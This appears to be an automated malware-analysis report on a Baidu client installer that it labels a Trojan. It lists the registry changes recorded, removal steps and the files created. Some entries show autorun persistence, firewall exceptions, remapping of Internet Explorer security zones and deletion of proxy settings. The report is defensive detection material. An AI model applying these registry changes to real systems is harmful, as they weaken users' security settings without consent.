[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppPath" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"UninstallString" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayName" = "百度"
[HKLM\SOFTWARE\Baidu\Baidu]
"SupplyID" = "1050103060"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Baidu\Baidu\ConStatus]
"AutoRun" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Baidu\Baidu]
"BrowserSelected" = "2"
"INSTLANG" = "2052"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"Publisher" = "百度在线网络技术(北京)有é™Âå…¬å¸"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDir" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Baidu\Baidu]
"Version" = "1.6.200.359"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 F3 D4 F5 5C 98 BD FA 37 40 BE 0D 0F 88 FE 78"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppName" = "Baidu.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayVersion" = "1.6.200.359"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDate" = "2015-10-17"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Baidu\Baidu]
"channel" = "MainFrame=0,SearchBar=1,Tray=1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayIcon" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe,0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Baidu.exe:968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 DA D8 51 00 8E 89 5F C8 C9 5B 45 F3 B5 A3 F4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduUpdate.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe:*:Enabled:BaiduUpdate.exe"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"BaiduBugRpt.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe:*:Enabled:BaiduBugRpt.exe"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe:*:Enabled:Baidu.exe"
The process Baidu.exe:808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 6E 45 87 80 A4 B7 06 F3 B9 81 4B 11 14 64 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The process Baidu.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 49 05 4F EF DA A3 46 F1 A0 FB 5D 34 81 09 82"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process Baidu.exe:2540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 7B 70 4F E5 0D 60 A8 C0 2F DA 6B 06 69 05 BE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
The process Baidu.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 51 9D B6 76 06 C0 43 91 E1 D8 6D 30 13 E1 38"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
The process YouQian_Setup.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 91 78 4A 9A B4 DF DB F7 0C A0 31 00 18 DD 71"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Baidu_Setup_1.6.200.359_ftn_1050103060.exe:1308
Baidu.exe:968
Baidu.exe:1836
Baidu.exe:2540
Baidu.exe:3220
YouQian_Setup.exe:1488 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\7gj1[1] (991986 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\7b1[1] (353734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\Baidu_Setup_1.6.200.359_ftn_1050103060[1].exe (688653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\2k[1] (205033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EDTTN6HH\uc1[1] (984448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\æ¡Œé¢百度.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\InstallHelper.dll (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\æ¡Œé¢百度\132.exe (172202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm5.tmp (447624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\349.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Base.dll (77808 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\Software.pb (9984 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall-1.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\arrow.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\haze.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\login\login.html (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\InstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Update.dll (11040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F6HGJOR7\bdzc_Setup_2.0.3.124[1].dll (18424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\common\msgconfig.pb (142 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\icon_xinwen.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-right.png (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\foggy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\login_mods.js (14 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\pack.bat (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\weixinUI.xml (345 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-storm.png (926 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download-hover.png (985 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\app-error.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe (18640 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks_z.png (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-rain.png (864 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\executor.xml (310 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\icon_gupiao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sandstorm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\PluginSetup.xml (625 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo57x65.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\skinres.rdb (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\overcast.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\icon_yinyue.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.woff (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-google.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\foggy.png (663 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_m.png (124 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\kuaidi.png (312 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\res_jietu.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\dust.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\default-icon.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dy.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr6.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\msvcr100.dll (51648 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\executor.xml (172 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\advance.png (377 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\icon_bianqian.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\PluginSetup.xml (612 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\344.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\respond.min.js (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_m.png (925 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduBugRpt.exe (13168 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-circle-loading.gif (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder.png (276 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\404.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\main.js (1552 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\jietuDll.dll (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\UIHandler.dll (120372 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-loading.gif (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\banner.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower.png (1 bytes)
